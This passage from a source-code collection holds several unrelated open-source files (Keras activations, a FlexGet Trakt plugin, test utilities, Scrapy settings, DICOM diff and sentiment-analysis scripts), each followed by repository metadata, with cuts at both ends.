x: Input tensor.
Returns:
Tensor of same shape and dtype of input `x`, with tanh activation:
`tanh(x) = sinh(x)/cosh(x) = ((exp(x) - exp(-x))/(exp(x) + exp(-x)))`.
"""
return nn.tanh(x)
@keras_export('keras.activations.sigmoid')
@dispatch.add_dispatch_support
def sigmoid(x):
"""Sigmoid activation function, `sigmoid(x) = 1 / (1 + exp(-x))`.
Applies the sigmoid activation function. For small values (<-5),
`sigmoid` returns a value close to zero, and for large values (>5)
the result of the function gets close to 1.
Sigmoid is equivalent to a 2-element Softmax, where the second element is
assumed to be zero. The sigmoid function always returns a value between
0 and 1.
For example:
>>> a = tf.constant([-20, -1.0, 0.0, 1.0, 20], dtype = tf.float32)
>>> b = tf.keras.activations.sigmoid(a)
>>> b.numpy()
array([2.0611537e-09, 2.6894143e-01, 5.0000000e-01, 7.3105860e-01,
1.0000000e+00], dtype=float32)
Arguments:
x: Input tensor.
Returns:
Tensor with the sigmoid activation: `1 / (1 + exp(-x))`.
"""
return nn.sigmoid(x)
@keras_export('keras.activations.exponential')
@dispatch.add_dispatch_support
def exponential(x):
"""Exponential activation function.
For example:
>>> a = tf.constant([-3.0,-1.0, 0.0,1.0,3.0], dtype = tf.float32)
>>> b = tf.keras.activations.exponential(a)
>>> b.numpy()
array([0.04978707, 0.36787945, 1., 2.7182817 , 20.085537], dtype=float32)
Arguments:
x: Input tensor.
Returns:
Tensor with exponential activation: `exp(x)`.
"""
return math_ops.exp(x)
@keras_export('keras.activations.hard_sigmoid')
@dispatch.add_dispatch_support
def hard_sigmoid(x):
"""Hard sigmoid activation function.
A faster approximation of the sigmoid activation.
For example:
>>> a = tf.constant([-3.0,-1.0, 0.0,1.0,3.0], dtype = tf.float32)
>>> b = tf.keras.activations.hard_sigmoid(a)
>>> b.numpy()
array([0. , 0.3, 0.5, 0.7, 1. ], dtype=float32)
Arguments:
x: Input tensor.
Returns:
The hard sigmoid activation, defined as:
- `if x < -2.5: return 0`
- `if x > 2.5: return 1`
- `if -2.5 <= x <= 2.5: return 0.2 * x + 0.5`
"""
return K.hard_sigmoid(x)
@keras_export('keras.activations.linear')
@dispatch.add_dispatch_support
def linear(x):
"""Linear activation function (pass-through).
For example:
>>> a = tf.constant([-3.0,-1.0, 0.0,1.0,3.0], dtype = tf.float32)
>>> b = tf.keras.activations.linear(a)
>>> b.numpy()
array([-3., -1., 0., 1., 3.], dtype=float32)
Arguments:
x: Input tensor.
Returns:
The input, unmodified.
"""
return x
@keras_export('keras.activations.serialize')
@dispatch.add_dispatch_support
def serialize(activation):
"""Returns the string identifier of an activation function.
Arguments:
      activation: Function object.
  Returns:
      String denoting the name attribute of the input function.
For example:
>>> tf.keras.activations.serialize(tf.keras.activations.tanh)
'tanh'
>>> tf.keras.activations.serialize(tf.keras.activations.sigmoid)
'sigmoid'
>>> tf.keras.activations.serialize('abcd')
Traceback (most recent call last):
...
ValueError: ('Cannot serialize', 'abcd')
Raises:
ValueError: The input function is not a valid one.
"""
if (hasattr(activation, '__name__') and
activation.__name__ in _TF_ACTIVATIONS_V2):
return _TF_ACTIVATIONS_V2[activation.__name__]
return serialize_keras_object(activation)
@keras_export('keras.activations.deserialize')
@dispatch.add_dispatch_support
def deserialize(name, custom_objects=None):
"""Returns activation function given a string identifier.
Args:
name: The name of the activation function.
custom_objects: Optional `{function_name: function_obj}`
dictionary listing user-provided activation functions.
Returns:
Corresponding activation function.
For example:
>>> tf.keras.activations.deserialize('linear')
<function linear at 0x1239596a8>
>>> tf.keras.activations.deserialize('sigmoid')
<function sigmoid at 0x123959510>
>>> tf.keras.activations.deserialize('abcd')
Traceback (most recent call last):
...
ValueError: Unknown activation function:abcd
Raises:
ValueError: `Unknown activation function` if the input string does not
denote any defined Tensorflow activation function.
"""
return deserialize_keras_object(
name,
module_objects=globals(),
custom_objects=custom_objects,
printable_module_name='activation function')
@keras_export('keras.activations.get')
@dispatch.add_dispatch_support
def get(identifier):
  """Returns the activation function corresponding to `identifier`.
Arguments:
identifier: Function or string
Returns:
Function corresponding to the input string or input function.
For example:
>>> tf.keras.activations.get('softmax')
<function softmax at 0x1222a3d90>
>>> tf.keras.activations.get(tf.keras.activations.softmax)
<function softmax at 0x1222a3d90>
>>> tf.keras.activations.get(None)
<function linear at 0x1239596a8>
>>> tf.keras.activations.get(abs)
<built-in function abs>
>>> tf.keras.activations.get('abcd')
Traceback (most recent call last):
...
ValueError: Unknown activation function:abcd
Raises:
ValueError: Input is an unknown function or string, i.e., the input does
not denote any defined function.
"""
if identifier is None:
return linear
if isinstance(identifier, six.string_types):
identifier = str(identifier)
return deserialize(identifier)
elif isinstance(identifier, dict):
return deserialize(identifier)
elif callable(identifier):
return identifier
else:
raise TypeError(
'Could not interpret activation function identifier: {}'.format(
identifier))
|
{
"content_hash": "517ecc950b96050213ab63a92fdb8d06",
"timestamp": "",
"source": "github",
"line_count": 560,
"max_line_length": 80,
"avg_line_length": 30.76607142857143,
"alnum_prop": 0.6702072087759011,
"repo_name": "aldian/tensorflow",
"id": "119851f4e133d74b25595b359ac535592539029d",
"size": "17918",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/python/keras/activations.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "8458"
},
{
"name": "C",
"bytes": "201402"
},
{
"name": "C++",
"bytes": "29667924"
},
{
"name": "CMake",
"bytes": "647100"
},
{
"name": "Go",
"bytes": "976514"
},
{
"name": "Java",
"bytes": "412117"
},
{
"name": "Jupyter Notebook",
"bytes": "1833675"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "38128"
},
{
"name": "Objective-C",
"bytes": "7056"
},
{
"name": "Objective-C++",
"bytes": "63210"
},
{
"name": "Perl",
"bytes": "6715"
},
{
"name": "Protocol Buffer",
"bytes": "275733"
},
{
"name": "PureBasic",
"bytes": "24932"
},
{
"name": "Python",
"bytes": "26424665"
},
{
"name": "Ruby",
"bytes": "327"
},
{
"name": "Shell",
"bytes": "373109"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals, division, absolute_import
import logging
import re
from requests import RequestException
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.utils.cached_input import cached
from flexget.utils.trakt import get_api_url, get_session, make_list_slug
log = logging.getLogger('trakt_list')
field_maps = {
'movie': {
'title': lambda i: '%s (%s)' % (i['movie']['title'], i['movie']['year']),
'movie_name': 'movie.title',
'movie_year': 'movie.year',
'imdb_id': 'movie.ids.imdb',
'tmdb_id': 'movie.ids.tmdb',
'trakt_movie_id': 'movie.ids.trakt',
'trakt_movie_slug': 'movie.ids.slug'
},
'show': {
'title': lambda i: '%s (%s)' % (i['show']['title'], i['show']['year']),
'series_name': lambda i: '%s (%s)' % (i['show']['title'], i['show']['year']),
'imdb_id': 'show.ids.imdb',
'tvdb_id': 'show.ids.tvdb',
'tvrage_id': 'show.ids.tvrage',
'tmdb_id': 'show.ids.tmdb',
'trakt_show_id': 'show.ids.trakt',
'trakt_slug': 'show.ids.slug'
},
'episode': {
'title': lambda i: '%s (%s) S%02dE%02d %s' % (i['show']['title'], i['show']['year'], i['episode']['season'],
i['episode']['number'], i['episode']['title']),
'series_name': lambda i: '%s (%s)' % (i['show']['title'], i['show']['year']),
'series_season': 'episode.season',
'series_episode': 'episode.number',
'series_id': lambda i: 'S%02dE%02d' % (i['episode']['season'], i['episode']['number']),
'imdb_id': 'show.ids.imdb',
'tvdb_id': 'show.ids.tvdb',
'tvrage_id': 'show.ids.tvrage',
'trakt_episode_id': 'episode.ids.trakt',
'trakt_show_id': 'show.ids.trakt',
'trakt_show_slug': 'show.ids.slug'
}
}
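# Illustrative sketch (not part of the original file): given a hypothetical
# list item such as
#   {'movie': {'title': 'Alien', 'year': 1979,
#              'ids': {'imdb': 'tt0078748', 'slug': 'alien-1979'}}}
# entry.update_using_map(field_maps['movie'], item) would set
#   entry['title'] == 'Alien (1979)' and entry['imdb_id'] == 'tt0078748'.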
class TraktList(object):
"""Creates an entry for each item in your trakt list.
Syntax:
trakt_list:
username: <value>
password: <value>
type: <shows|movies|episodes>
list: <collection|watchlist|watched|custom list name>
strip_dates: <yes|no>
Options username, type and list are required. password is required for private lists.
"""
schema = {
'type': 'object',
'properties': {
'username': {'type': 'string'},
'password': {'type': 'string'},
'type': {'type': 'string', 'enum': ['shows', 'movies', 'episodes']},
'list': {'type': 'string'},
'strip_dates': {'type': 'boolean', 'default': False}
},
'required': ['username', 'type', 'list'],
'additionalProperties': False,
'not': {
'properties': {
'type': {'enum': ['episodes']},
'list': {'enum': ['collection', 'watched']}
}
},
'error_not': '`collection` and `watched` lists do not support `episodes` type'
}
@cached('trakt_list', persist='2 hours')
def on_task_input(self, task, config):
session = get_session(config['username'], config.get('password'))
endpoint = ['users', config['username']]
if config['list'] in ['collection', 'watchlist', 'watched']:
endpoint += (config['list'], config['type'])
else:
endpoint += ('lists', make_list_slug(config['list']), 'items')
log.verbose('Retrieving `%s` list `%s`' % (config['type'], config['list']))
try:
result = session.get(get_api_url(endpoint))
try:
data = result.json()
except ValueError:
log.debug('Could not decode json from response: %s', result.text)
raise plugin.PluginError('Error getting list from trakt.')
except RequestException as e:
raise plugin.PluginError('Could not retrieve list from trakt (%s)' % e.args[0])
if not data:
log.warning('No data returned from trakt for %s list %s.' % (config['type'], config['list']))
return
entries = []
list_type = (config['type']).rstrip('s')
for item in data:
# Collection and watched lists don't return 'type' along with the items (right now)
if 'type' in item and item['type'] != list_type:
log.debug('Skipping %s because it is not a %s' % (item[item['type']].get('title', 'unknown'), list_type))
continue
if not item[list_type]['title']:
                # Lists sometimes contain bad show entries with no title. Skip them.
log.warning('Item in trakt list does not appear to have a title, skipping.')
continue
entry = Entry()
if list_type == 'episode':
entry['url'] = 'http://trakt.tv/shows/%s/seasons/%s/episodes/%s' % (
item['show']['ids']['slug'], item['episode']['season'], item['episode']['number'])
else:
entry['url'] = 'http://trakt.tv/%s/%s' % (list_type, item[list_type]['ids'].get('slug'))
entry.update_using_map(field_maps[list_type], item)
if entry.isvalid():
if config.get('strip_dates'):
# Remove year from end of name if present
entry['title'] = re.sub(r'\s+\(\d{4}\)$', '', entry['title'])
entries.append(entry)
else:
log.debug('Invalid entry created? %s' % entry)
return entries
@event('plugin.register')
def register_plugin():
plugin.register(TraktList, 'trakt_list', api_ver=2)
|
{
"content_hash": "bbe2258c8a47701ca1b484a4749c9e0a",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 121,
"avg_line_length": 39.73426573426573,
"alnum_prop": 0.5323829637451601,
"repo_name": "v17al/Flexget",
"id": "e38e678b3978feae1b581dd83074ae7dcae42395",
"size": "5682",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "flexget/plugins/input/trakt_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "56725"
},
{
"name": "HTML",
"bytes": "35670"
},
{
"name": "JavaScript",
"bytes": "455222"
},
{
"name": "Python",
"bytes": "2021713"
}
],
"symlink_target": ""
}
|
import os, pytest
import subprocess
from quarkc import _metadata
def is_excluded_file(name):
if "quarkc/lib/" in name or name == "reflector":
return True
else:
return False
def is_runtime(path):
return "quark_" in path and "_runtime" in path
def filter_builtin(content):
"""Filter out lines that shouldn't be compared in tests."""
if content is None:
return None
lines = content.split("\n")
result = []
skipping = False
for line in lines:
# Checked-in test comparison packaging hardcodes version 0.0.1 since we
# have different versions of Quark stdlib on each release:
quark_dependency = (('"quark": "0.0.1"' in line) or
('"quark": "{}"'.format(_metadata.__version__) in line) or
("spec.add_runtime_dependency 'quark'" in line) or
("<version>0.0.1</version>" in line) or
("<version>{}</version>".format(_metadata.__version__) in line) or
("install_requires" in line and "quark==" in line))
if "BEGIN_BUILTIN" in line:
skipping = True
if not skipping and not quark_dependency:
result.append(line)
if "END_BUILTIN" in line:
skipping = False
return "\n".join(result)
def is_valid_change(path, content, expected):
if is_runtime(path): return True
return filter_builtin(content) == filter_builtin(expected)
def check_file(path, content):
try:
with open(path) as fd:
expected = fd.read()
except IOError:
expected = None
if expected != content:
dir = os.path.dirname(path)
if not os.path.exists(dir):
os.makedirs(dir)
if is_valid_change(path, content, expected):
with open(path, "wb") as fd: fd.write(content)
return content
else:
with open(path + ".cmp", "wb") as fd: fd.write(content)
return expected
def assert_file(path, content):
expected = check_file(path, content)
assert content == expected
def maybe_xfail(code, ext=None):
if "xfail" in code and "xfail:" not in code:
pytest.xfail()
if ext and ("xfail:%s"%ext) in code:
pytest.xfail()
def get_git_top(start="."):
try:
git_top = subprocess.check_output("git rev-parse --show-toplevel".split(), cwd=start).strip()
except (OSError, subprocess.CalledProcessError):
raise ValueError("Not a git repository: %r" % start)
return git_top
|
{
"content_hash": "2af6224f72bb24718b71eaa9c1637538",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 101,
"avg_line_length": 33.8421052631579,
"alnum_prop": 0.5847589424572317,
"repo_name": "datawire/quark",
"id": "8d237008d6b731eacb50316ae637bd645f6f32bb",
"size": "3167",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "quarkc/test/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1802"
},
{
"name": "HTML",
"bytes": "8346"
},
{
"name": "Java",
"bytes": "381125"
},
{
"name": "JavaScript",
"bytes": "501785"
},
{
"name": "Python",
"bytes": "643417"
},
{
"name": "Ruby",
"bytes": "370423"
},
{
"name": "Shell",
"bytes": "21479"
}
],
"symlink_target": ""
}
|
BOT_NAME = 'vagascrawler'
SPIDER_MODULES = ['vagascrawler.spiders']
NEWSPIDER_MODULE = 'vagascrawler.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'vagascrawler (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'vagascrawler.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'vagascrawler.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'vagascrawler.pipelines.RethinkdbPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
#RethinkDB configuration
#RDB_HOST="localhost"
#RDB_PORT=29015
#RDB_DATABASE="vagascrawler"
|
{
"content_hash": "fc1175a3dd0716b5dfed16ef1c9fb7bb",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 109,
"avg_line_length": 34.10126582278481,
"alnum_prop": 0.781365998515219,
"repo_name": "berlotto/openjobs-scraper",
"id": "7dce27b29ac889677a50356d86e7064b612a76bd",
"size": "3131",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vagascrawler/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7011"
}
],
"symlink_target": ""
}
|
__author__ = "Christian Schwede <info@cschwede.de>"
name = 'swquota'
entry_point = '%s.middleware:filter_factory' % (name)
version = '0.1'
from setuptools import setup, find_packages
setup(
name=name,
version=version,
description='Swift quota middleware',
license='Apache License (2.0)',
author='OpenStack, LLC.',
author_email='info@cschwede.de',
url='https://github.com/cschwede/%s' % (name),
packages=find_packages(),
test_suite='nose.collector',
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.6',
'Environment :: No Input/Output (Daemon)'],
install_requires=['swift'],
entry_points={
'paste.filter_factory': ['swquota=%s' % entry_point]
},
scripts=['bin/swquota-tool']
)
|
{
"content_hash": "e249ecebd5078649bc649eaa71853deb",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 61,
"avg_line_length": 31.379310344827587,
"alnum_prop": 0.6241758241758242,
"repo_name": "garvenshen/swquota",
"id": "825b3a54bb268f8a876059daafa62ca123577632",
"size": "936",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
"""Show the difference between two dicom files.
"""
# Copyright (c) 2008-2012 Darcy Mason
# This file is part of pydicom, released under an MIT license.
# See the file license.txt included with this distribution, also
# available at http://pydicom.googlecode.com
from __future__ import print_function
usage = """
Usage:
python DicomDiff.py file1 file2
Results printed in python difflib form - indicated by start of each line:
' ' blank means lines the same
'-' means in file1 but "removed" in file2
'+' means not in file1, but "added" in file2
('?' lines from difflib removed - no use here)
"""
import sys
import dicom
import difflib
# only used as a script
if len(sys.argv) != 3:
print(usage)
sys.exit()
datasets = dicom.read_file(sys.argv[1]), \
dicom.read_file(sys.argv[2])
# difflib compare functions require a list of lines, each terminated with a newline character
# massage the string representation of each dicom dataset into this form:
rep = []
for dataset in datasets:
lines = str(dataset).split("\n")
lines = [line + "\n" for line in lines] # add the newline to end
rep.append(lines)
diff = difflib.Differ()
for line in diff.compare(rep[0], rep[1]):
if line[0] != "?":
print(line)
|
{
"content_hash": "b6fa99eacea7eb022ffd74f2f3f62f74",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 90,
"avg_line_length": 27.711111111111112,
"alnum_prop": 0.6920609462710505,
"repo_name": "njvack/yadda",
"id": "2dd91c64ada251e3442edbc9c607482e247166b2",
"size": "1262",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "dicom/examples/DicomDiff.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1729924"
},
{
"name": "Shell",
"bytes": "1250"
}
],
"symlink_target": ""
}
|
from os import path, pardir
import sys
import logging
# not used in this stub but often useful for finding various files
PROJECT_ROOT_DIRPATH = path.join(path.dirname(__file__), pardir, pardir)
sys.path.append(PROJECT_ROOT_DIRPATH)
# Third-party modules
import click
from dotenv import find_dotenv, load_dotenv
# Hand-made modules
from src.models.split import ValidationSplitHandler
TRAIN_FILEPATH_PREFIX = path.join(
PROJECT_ROOT_DIRPATH, "data/interim/dataset.train_X_y"
)
TRAIN_FILEPATH_SUFFIX = "yonekurayama.blp"
LOCATIONS = (
"ukishima",
"ougishima",
"yonekurayama"
)
@click.command()
@click.option("--location", "-l", type=str, default=None)
@click.option("--n_splits", "-n", type=int, default=5)
def main(location, n_splits):
logger = logging.getLogger(__name__)
logger.info('#0: separating cross-validation index')
#
# generate index used in cross-validation trials
#
splitter = ValidationSplitHandler()
if location is None:
location_list = LOCATIONS
else:
location_list = [location, ]
for place in location_list:
train_filepath_prefix = path.join(
PROJECT_ROOT_DIRPATH, "data/processed/dataset.train_X_y"
)
splitter.separate_and_serialize_validation_index(
train_filepath_prefix, place, n_splits
)
logger.info('#1: get cross-validation test index @ {l}'.format(l=place))
logger.info('#1: end separating the cross-validation index')
if __name__ == '__main__':
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
# find .env automagically by walking up directories until it's found, then
# load up the .env entries as environment variables
load_dotenv(find_dotenv())
main()
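# Invocation sketch (options are the click flags defined above; the location
# value is illustrative):
#   python src/models/separate_validation_index.py --location ukishima --n_splits 5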
|
{
"content_hash": "17d96cc95c99d28d0d03cb3de1d06a52",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 81,
"avg_line_length": 28.107692307692307,
"alnum_prop": 0.6759715380405036,
"repo_name": "gciteam6/xgboost",
"id": "ee37f1c7f447fc33e87f0646a8f8d9a12548b3a9",
"size": "1846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/models/separate_validation_index.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "61501"
},
{
"name": "Makefile",
"bytes": "4545"
},
{
"name": "Python",
"bytes": "91012"
},
{
"name": "Shell",
"bytes": "3054"
}
],
"symlink_target": ""
}
|
__author__ = 'Lukasz Augustyniak'
import logging
from datetime import datetime
from pprint import pprint
from sklearn.linear_model import LogisticRegression
from textlytics.sentiment.sentiment import Sentiment
from textlytics.sentiment.io_sentiment import results_to_pickle
log = logging.getLogger(__name__)
ALL_CLASSIFIERS = {
# 'BernoulliNB': BernoulliNB(),
# 'GaussianNB': GaussianNB(),
# 'MultinomialNB': MultinomialNB(),
# 'DecisionTreeClassifier': DecisionTreeClassifier(),
# 'RandomForestClassifier': RandomForestClassifier(),
'LogisticRegression': LogisticRegression(),
# 'LinearSVC': LinearSVC(),
# 'Perceptron': Perceptron(),
# 'SVC': SVC(),
# 'AdaBoostClassifier': AdaBoostClassifier(),
# 'SVR': SVR(),
# 'NuSVC': NuSVC(),
# 'NuSVR': NuSVR(),
# 'OneClassSVM': OneClassSVM(),
# 'ExtraTreeClassifier': ExtraTreeClassifier()
}
def test_ensemble(dataset, source):
# ############################# LEXICONS ##################################
# dictionary for all predicted values
lexicons_predictions = {}
sentiment = Sentiment()
print datetime.now()
# lexicons_files = [
# 'AFINN-96.txt',
# 'AFINN-111.txt',
# # 'amazon_movies_25.txt',
# 'Bing-Liu.txt',
# 'enchantedlearning.com.txt',
# 'past_future_list.txt',
# 'past_future_list_plus.txt',
# 'simple_list.txt',
# 'simple_list_plus.txt',
# 'simplest.txt'
# ]
#
# category_lexicons = [
# 'amazon_automotive_5.txt',
# 'amazon_automotive_25.txt',
# 'amazon_books_5.txt',
# 'amazon_books_25.txt',
# 'amazon_electronics_5.txt',
# 'amazon_electronics_25.txt',
# 'amazon_health_5.txt',
# 'amazon_health_25.txt',
# 'amazon_movies_5.txt']
#
# for cl in category_lexicons:
# if cl.split('_')[1] in dataset.lower():
# lexicons_files.append(cl)
# print cl
# df, lexicon_prediction, lexicon_result, classes = \
# sentiment.lexicon_based_sentiment(
# f_name=dataset,
# sentiment_level='Document',
# lexicons_files=lexicons_files,
# words_stem=False)
# lexicons_predictions.update(lexicon_prediction)
# to_pickle(dataset, 'predictions', lexicon_prediction)
# to_pickle(dataset, 'lexicons', lexicon_result)
# pprint(lexicon_result)
# ############################# ENSEMBLE LEXICONS #########################
# ensemble_lexicons = SentimentEnsemble(classes=classes)
# ensemble_results = ensemble_lexicons.sentiment_ensemble_lexi_ml(
# lexicon_predictions=lexicons_predictions,
# ml_predictions={},
# classifiers=ALL_CLASSIFIERS,
# n_folds=2
# )
# to_pickle(dataset, 'ensemble-lexicons-only', ensemble_results)
# ############################# features_ngrams ############################
# all n grams to test
features_ngrams = {
'unigrams': (1, 1),
'bigrams': (2, 2),
# 'trigrams': (3, 3),
'n_grams_1_2': (1, 2),
'n_grams_1_3': (1, 3),
# 'n_grams_2_3': (2, 3)
}
logging.info(features_ngrams)
# dictionary for machine learning predictions (part of feature set for
# second step in ensemble approach)
ml_predictions = {}
############################# TfidfVectorizer ############################
# for n_gram_name, n_grams_range in features_ngrams.iteritems():
# print n_gram_name
# print 'TfidfVectorizer'
# f_name = n_gram_name + '_TfidfVectorizer'
# classes, ml_prediction, results_ml = sentiment.machine_learning_sentiment(
# file_name=dataset,
# worksheet_name='Arkusz1',
# n_gram_range=n_grams_range,
# n_folds=10,
# classifiers=ALL_CLASSIFIERS,
# # classifiers={'GaussianNB': GaussianNB()},
# # classifiers=None, # all classifier available in sentiment class
# amazon=True,
# lowercase=True,
# stop_words='english',
# max_df=1.0,
# min_df=0.0,
# max_features=None,
# results_filename=f_name,
# vectorizer='TfidfVectorizer',
# # tokenizer=document_preprocessor.tokenizer_with_stemming
# )
# # add all prediction dictionaries into feature set
# ml_predictions.update(ml_prediction)
# to_pickle(dataset, n_gram_name + '-' + f_name, results_ml)
# ############################# CountVectorizer ############################
for n_gram_name, n_grams_range in features_ngrams.iteritems():
print n_gram_name
print 'CountVectorizer'
f_name = n_gram_name + '_CountVectorizer'
classes, ml_prediction, results_ml = sentiment.supervised_sentiment(
dataset=dataset,
# worksheet_name='Arkusz1',
n_gram_range=n_grams_range,
n_folds=10,
# classifiers={'GaussianNB': GaussianNB()},
# classifiers=None, # all classifier available in sentiment class
classifiers=ALL_CLASSIFIERS,
# amazon=True,
lowercase=True,
stop_words='english',
max_df=1.0,
min_df=0.0,
max_features=None,
f_name_results=f_name,
vectorizer='CountVectorizer',
# tokenizer=document_preprocessor.tokenizer_with_stemming
source=source
)
ml_predictions.update(ml_prediction)
results_to_pickle(source, n_gram_name + '-' + f_name, results_ml)
pprint(results_ml['measures']['LogisticRegression']['f1-avg'])
pprint(results_ml['measures']['LogisticRegression']['acc-avg'])
# pprint(results_ml['measures']['SVC']['f1-avg'])
# pprint(lexicons_predictions)
# pprint(ml_predictions)
# ############################# ENSEMBLE ###################################
# ensemble = SentimentEnsemble(classes=classes)
# ensemble_results = ensemble.sentiment_ensemble_lexi_ml(
# lexicon_predictions=lexicons_predictions,
# ml_predictions=ml_predictions,
# classifiers=ALL_CLASSIFIERS,
# n_folds=10
# )
# to_pickle(dataset, 'ensemble', ensemble_results)
# ############################# OTHER ######################################
# sentiment.machine_learning_sentiment(
# file_name='Amazon-500x150-balanced.xlsx',
# worksheet_name='Arkusz1',
# n_gram_range=(1, 3),
# # classifiers={'GaussianNB': GaussianNB()},
# # classifiers={},
# amazon=True)
#
# sentiment.machine_learning_sentiment(
# file_name='Amazon-500x150-balanced.xlsx',
# worksheet_name='Arkusz1',
# n_gram_range=(1, 2),
# classifiers={'GaussianNB': GaussianNB()},
# # classifiers={},
# amazon_dataset=True)
#
# sentiment.machine_learning_sentiment(
# file_name='Amazon-500x150-balanced.xlsx',
# worksheet_name='Arkusz1',
# n_gram_range=(1, 1),
# classifiers={'GaussianNB': GaussianNB()},
# # classifiers={},
# amazon_dataset=True)
#
# # only positive and negative
# sentiment.machine_learning_sentiment(
# file_name=path.join('Amazon-4k-pos-neg.xls'),
# # file_name=path.join('Amazon-500x150-balanced.xlsx'),
# worksheet_name='Arkusz1',
# # classifiers={'GaussianNB': GaussianNB()},
# classifiers={},
# amazon_dataset=True,
# progress_interval=3)
# ############################# TEST RUNNING ###################################
#
# parser = argparse.ArgumentParser()
# parser.add_argument("dataset", help="path to dataset file")
# args = parser.parse_args()
# test_ensemble(dataset=args.dataset)
test_ensemble(dataset='C:/Datasets/semeval/2013/semeval-2013.csv', source='semeval2013')
# test_ensemble(dataset='Amazon-500x150-balanced.xlsx')
# test_ensemble(dataset='Automotive9600.csv')
# test_ensemble(dataset='Books9600.csv')
# test_ensemble(dataset='Health & Personal Care9600.csv')
# test_ensemble(dataset='Movies & TV9600.csv')
# test_ensemble(dataset='Movies & TV3200.csv')
# test_ensemble(dataset='Movies_&_TV1200.csv')
# test_ensemble(dataset='Movies & TV-1-3-5-x-1000.csv')
# test_ensemble(dataset='Music9600.csv')
# test_ensemble(dataset='semeval2013.csv', source='semeval2013')
# test_ensemble(dataset='semeval2014.csv', source='semeval2014')
# test_ensemble(dataset='Automotive200.csv', source='amazon')
# test_ensemble(dataset='Amazon-7.xlsx')
# test_ensemble()
|
{
"content_hash": "98fa79b9486c9cd93148413ea811eb8a",
"timestamp": "",
"source": "github",
"line_count": 235,
"max_line_length": 88,
"avg_line_length": 37.05106382978723,
"alnum_prop": 0.5704605489835765,
"repo_name": "laugustyniak/textlytics",
"id": "c12a76ca1ad35bc2d3df0a7847f5c7c862ef6271",
"size": "8731",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/sentiment_superv.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "199403"
},
{
"name": "Shell",
"bytes": "292"
}
],
"symlink_target": ""
}
|
from zeit.cms.i18n import MessageFactory as _
import zeit.cms.browser.menu
import zeit.cms.browser.view
import zeit.cms.repository.interfaces
import zeit.connector.interfaces
import zope.event
class Reload(zeit.cms.browser.view.Base):
"""Reload folder (invalidate cache)."""
def __call__(self):
zope.event.notify(
zeit.connector.interfaces.ResourceInvaliatedEvent(
self.context.uniqueId))
zope.event.notify(
